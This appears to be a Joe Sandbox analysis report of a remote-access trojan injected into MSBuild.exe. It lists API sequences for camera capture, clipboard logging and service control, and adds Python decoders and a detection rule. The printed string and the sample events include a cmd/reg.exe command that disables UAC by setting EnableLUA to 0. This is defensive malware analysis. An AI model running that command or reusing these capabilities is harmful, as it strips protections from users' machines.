• Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
• Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
• Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C

APIs
• __allrem.LIBCMT ref: 00439789
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
• __allrem.LIBCMT ref: 004397BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
• __allrem.LIBCMT ref: 004397F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
• Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
• Opcode Fuzzy Hash: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
• Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58

Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
• Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D

Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
• Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
• Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
• Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
• Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B

APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
• API String ID: 3469354165-462540288
• Opcode ID: 0f397e84a234476d91d5a4c8e134a30c98f2e631d09e37a33e2b9d2e1e89063a
• Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
• Opcode Fuzzy Hash: 0f397e84a234476d91d5a4c8e134a30c98f2e631d09e37a33e2b9d2e1e89063a
• Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
• Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
• Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
• Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9

APIs
• GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
• SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
• Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
• Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
• Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C

APIs
• GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
• _free.LIBCMT ref: 00446EF6
• _free.LIBCMT ref: 00446F1E
• SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
• _abort.LIBCMT ref: 00446F3D
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
• Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
• Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
• Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
• Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
• Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
• Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
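The three functions listed above are the sample's remote service stop, pause and resume commands: each opens the SCM, opens a service by name, sends one control code (1, 2, 3) and closes both handles. The OpenServiceW access mask changes with the control code (0x20 = SERVICE_STOP for control 1, 0x40 = SERVICE_PAUSE_CONTINUE for controls 2 and 3), which is exactly what ControlService requires. The following decoder is an added example, not part of the Joe Sandbox report or of the sample; it parses the report's own "APIs" lines (copied verbatim into the constant) and maps the desired-access and control values to their Win32 names, flagging whether the access requested actually permits the control sent.

```python
import re

# Constructed input: the OpenSCManagerW / OpenServiceW / ControlService lines copied from
# the report's listing above, so the block runs offline (CloseServiceHandle lines omitted).
SAMPLE_LISTING = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
"""

# Service-object access rights (winsvc.h) and ControlService control codes.
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
# Access right the SCM checks on the service handle for each control code.
REQUIRED_ACCESS = {1: 0x0020, 2: 0x0040, 3: 0x0040, 4: 0x0080}

# One "• Api.Module(arg,arg,...), ref: ADDR" line; '?' marks a stack slot the plugin could not resolve.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_calls(listing):
    """Return [(api, [args...], ref_address)] for every API line in a Joe Sandbox 'APIs' listing."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")]
            calls.append((m.group("api"), args, int(m.group("ref"), 16)))
    return calls


def _hex_or_none(arg):
    return None if arg == "?" else int(arg, 16)


def summarize_service_control(listing):
    """Group each OpenSCManagerW -> OpenServiceW -> ControlService sequence into one decoded record."""
    records, cur = [], None
    for api, args, ref in parse_calls(listing):
        if api == "OpenSCManagerW":
            cur = {"first_ref": ref, "access": None, "control": None}
            records.append(cur)
        elif api == "OpenServiceW" and cur is not None:
            cur["access"] = _hex_or_none(args[2])    # dwDesiredAccess (3rd parameter)
        elif api == "ControlService" and cur is not None:
            cur["control"] = _hex_or_none(args[1])   # dwControl (2nd parameter)
    out = []
    for r in records:
        access, control = r["access"], r["control"]
        rights = [name for bit, name in SERVICE_ACCESS.items()
                  if access is not None and access & bit]
        needed = REQUIRED_ACCESS.get(control)
        out.append({
            "ref": f"{r['first_ref']:08X}",
            "access": rights,
            "control": SERVICE_CONTROL.get(control, f"unknown({control})"),
            # True when the handle was opened with the right the control code needs.
            "access_matches_control": bool(access is not None and needed is not None and access & needed),
        })
    return out


if __name__ == "__main__":
    for rec in summarize_service_control(SAMPLE_LISTING):
        print(rec)
```

Running it over the listing yields stop, pause and continue records whose access masks all match the control sent; any mismatch (for example a STOP sent on a handle opened only with SERVICE_PAUSE_CONTINUE) would show up as a false flag and would fail at runtime with ERROR_ACCESS_DENIED. The same parser works on any "APIs" block in this report, which is useful when triaging the other Remcos command handlers below.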
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]$DG
                                                                                                • API String ID: 3554306468-1089238109
                                                                                                • Opcode ID: b9beffbb743b5d0a6d83e5e9673c714a42b3f29c629c30badf76164a41f06e61
                                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                • Opcode Fuzzy Hash: b9beffbb743b5d0a6d83e5e9673c714a42b3f29c629c30badf76164a41f06e61
                                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                APIs
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                • API String ID: 2974294136-753205382
                                                                                                • Opcode ID: d8a85142c57b71bd77405a02b73158c59f94f9b5e14c09358a9c1a5aed2895e8
                                                                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                • Opcode Fuzzy Hash: d8a85142c57b71bd77405a02b73158c59f94f9b5e14c09358a9c1a5aed2895e8
                                                                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID: `AG
                                                                                                • API String ID: 1958988193-3058481221
                                                                                                • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                Strings
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
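This function is the sample's "disable UAC" command: it spawns cmd.exe with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW) and has it run reg.exe to set EnableLUA to 0 under HKLM\...\Policies\System. The write only succeeds from an elevated process and only takes effect after a reboot, but the process-creation event is visible immediately. The detection below is an added example, not part of the report or of any vendor rule set; it runs over constructed process-creation records (field names loosely follow Sysmon Event ID 1) and flags the command line from the listing plus spelling variants (full hive name, quoted key, lowercase value name, hex data), while ignoring reads of the same value and writes that re-enable UAC.

```python
import re

# Constructed sample events (not from the report). Event 1234 is the exact command line the
# listing above shows; the others are variants an analyst would want to catch or ignore.
SAMPLE_EVENTS = [
    {"pid": 1234, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 1235, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 2000, "image": r"C:\Windows\System32\reg.exe",   # benign read of the value
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
    {"pid": 2001, "image": r"C:\Windows\System32\reg.exe",   # full hive name, quoted key, hex data
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v enablelua /t REG_DWORD /d 0x0 /f'},
    {"pid": 2002, "image": r"C:\Windows\System32\reg.exe",   # re-enabling UAC, not flagged
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
]

# The policy key, accepting the HKLM abbreviation or the full hive name, case-insensitively.
POLICY_KEY_RE = re.compile(
    r"^(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System$",
    re.I)


def split_cmdline(cmdline):
    """Tokenise a Windows command line: double-quoted runs stay together, quotes are stripped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _option(tokens, name):
    """Value following a reg.exe switch such as /v or /d, or None if absent."""
    low = [t.lower() for t in tokens]
    for i, t in enumerate(low):
        if t == name and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def is_uac_disable(cmdline):
    """True when the command line runs `reg add` on the System policy key and sets EnableLUA to 0.

    reg.exe may appear as a bare name, an absolute path or an %windir%-relative path, and may be
    wrapped by `cmd.exe /k` or `/c` as in the listing; the wrapper is flagged too."""
    tokens = split_cmdline(cmdline)
    low = [t.lower() for t in tokens]
    idx = next((i for i, t in enumerate(low)
                if t in ("reg", "reg.exe") or t.endswith("\\reg.exe")), None)
    if idx is None or idx + 2 >= len(tokens) or low[idx + 1] != "add":
        return False
    if not POLICY_KEY_RE.match(tokens[idx + 2]):
        return False
    if (_option(tokens, "/v") or "").lower() != "enablelua":
        return False
    data = _option(tokens, "/d")
    try:
        return int(data, 0) == 0      # base 0 accepts "0" and "0x0"
    except (TypeError, ValueError):   # missing or non-numeric data: not the pattern we want
        return False


def find_uac_disable(events):
    """Return the events whose command line disables UAC via the EnableLUA policy value."""
    return [e for e in events if is_uac_disable(e["cmdline"])]


if __name__ == "__main__":
    for e in find_uac_disable(SAMPLE_EVENTS):
        print(e["pid"], e["image"], e["cmdline"])
```

The check keys on the verb, the key path, the value name and the data rather than on a substring, so a `reg query` of the same value or a `/d 1` repair does not fire. On a live host the write also surfaces as a registry value-set event on the same key; correlating that with this process-creation hit, and with the MSBuild.exe parent seen in this analysis, gives a much lower false-positive rate than either signal alone.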
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
